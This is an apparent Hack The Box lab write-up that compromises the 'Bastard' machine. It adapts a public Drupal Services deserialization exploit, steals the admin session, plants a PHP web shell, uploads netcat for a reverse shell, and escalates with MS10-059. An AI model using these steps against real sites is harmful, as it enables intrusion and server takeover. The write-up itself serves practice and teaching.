Bastard Writeup w/o Metasploit

Reconnaissance

Run the nmapAutomator script to enumerate open ports and services running on those ports.

./nmapAutomator.sh 10.10.10.9 All
  • All: Runs all the scans consecutively.

We get back the following result.

Running all scans on 10.10.10.9Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:56 EST
Nmap scan report for 10.10.10.9
Host is up (0.043s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 6.84 seconds---------------------Starting Nmap Basic Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:56 EST
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.32 seconds----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:57 EST
Nmap scan report for 10.10.10.9
Host is up.
All 1000 scanned ports on 10.10.10.9 are open|filteredNmap done: 1 IP address (1 host up) scanned in 202.50 seconds---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 11:01 EST
Initiating Parallel DNS resolution of 1 host. at 11:01
Completed Parallel DNS resolution of 1 host. at 11:01, 0.02s elapsed
Initiating SYN Stealth Scan at 11:01
Scanning 10.10.10.9 [65535 ports]
....
Nmap scan report for 10.10.10.9
Host is up (0.045s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknownRead data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 264.79 seconds
Raw packets sent: 131270 (5.776MB) | Rcvd: 274 (17.620KB)No new ports---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 11:05 EST
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.13 seconds

Note: The gobuster, nikto and droopescan scans kept timing out. The web server seems to be not able to handle the requests that these tools were sending.

We have three open ports.

  • Port 80: running Drupal 7

  • Port 135 & 49154: running Microsoft Windows RPC

Before we move on to enumeration, let’s make some mental notes about the scan results.

  • Port 80 is running Drupal 7 which I know from the Hawk box is vulnerable to a bunch of exploits. Most of these exploits are associated with the modules that are installed on Drupal. Since droopescan is not working, we’ll have to manually figure out if these modules are installed.

Enumeration

Visit the web application in the browser.

It’s running Drupal which is is a free and open-source content management framework. Let’s look at the CHANGELOG to view the exact version.

It’s running Drupal 7.54.

Let’s try and find credentials to this application. I googled “default credentials drupal”, but I didn’t find anything useful. Next, I tried common credentials admin/admin, admin/password, etc. but was not able to log in.

When it is an off-the-shelf software, I usually don’t run a brute force attack on it because it probably has a lock out policy in place.

Next, run searchsploit.

searchsploit drupal 7

Let’s view vulnerability number 41564.

searchsploit -m 41564

It links to this blog post. It seems to be a deserialization vulnerability that leads to Remote Code Execution (RCE). Looking at the code, it we see that it visit the path /rest_endpoint to conduct the exploit.

$url = 'http://vmweb.lan/drupal-7.54';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';

That path is not found on the box, however, if we simply change it to /rest it works!

So it is using the Services module. We’ll use this exploit to gain an initial foothold on the box.

Initial Foothold

Make the following changes to the exploit code.

$url = '10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

There are also two comments that are not wrapped properly that you’ll need to fix.

Run the exploit.

php 41564.php

We get an “ Uncaught Error: Call to undefined function curl_init()” error message. That’s because we don’t have php-curl installed on our kali machine.

apt-get install php-curl

Now the exploit should work.

[email protected]:~/Desktop/htb/bastard# php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: 10.10.10.9/dixuSOspsOUU.php

Perfect! It created two files: session.json and user.json. View the content of user.json.

[email protected]:~/Desktop/htb/bastard# cat user.json
{
"uid": "1",
"name": "admin",
"mail": "[email protected]",
"theme": "",
"created": "1489920428",
"access": "1581904913",
"login": 1581908048,
"status": "1",
"timezone": "Europe\/Athens",
"language": "",
"picture": null,
"init": "[email protected]",
"data": false,
"roles": {
"2": "authenticated user",
"3": "administrator"
},
"rdf_mapping": {
"rdftype": [
"sioc:UserAccount"
],
"name": {
"predicates": [
"foaf:name"
]
},
"homepage": {
"predicates": [
"foaf:page"
],
"type": "rel"
}
},
"pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"

It gives us the hashed password of the admin user. We could run it through a password cracker, however, we don’t need to because the session.json file gives us a valid session cookie for the admin user.

[email protected]:~/Desktop/htb/bastard# cat session.json
{
"session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
"session_id": "lxPgeAwtaNwwE9BENklEVeWJf5CLaH5NFe5kEwM6_Is",
"token": "9EsaYcsIlgp7r31F9qG3HJILwA3cbTzSR-61nEB0r_Y"
}

Let’s add the cookie to our browser using the Cookie Manager plugin.

Then refresh the page.

We’re logged in as admin! Click on the Modules tab and check if the PHP filter is enabled. It is. This means we can add PHP code.

Click on Add new content on the welcome page > click on Basic page. In the Title field add the value “shell”. In the Body field add the simple PHP shell to upload/execute code from the following link. Make sure to include the “<?php ?>” tags and change it to the IP address of your attack machine. This gives us the ability to both execute and upload files. In the Text format filed choose the option PHP code. Then hit Save.

In my case the entry created is under the path /node/4. Let’s test it out.

We have code execution! I can’t seem to use powershell from here, so what we’ll do is upload netcat on the box and then use it to send a reverse shell back to our attack machine.

Run the systeminfo command.

It’s a 64-bit operating system. Download the 64-bit executable of netcat from here. Start up a python server.

python -m SimpleHTTPServer 7777

Upload it using the fupload parameter.

Then set up a listener on the attack machine.

nc -nlvp 1234

Use the uploaded netcat executable to send a reverse shell to our attack machine.

We get a shell!

[email protected]:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.9] 60572
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr

Grab the user.txt flag.

Now we need to escalate privileges.

Privilege Escalation

We know from the output of the systeminfo command the OS name and version.

OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600

The Arctic box was running the same OS, so I used the same exploit MS10–059 to escalate privileges for this box. I won’t explain it here, please refer to the the Arctic writeup.

Grab the root.txt flag.

Lessons Learned

What allowed me to gain initial access to the machine and escalate privileges, is exploiting known vulnerabilities that had patches available. So it goes without saying, you should always update your software!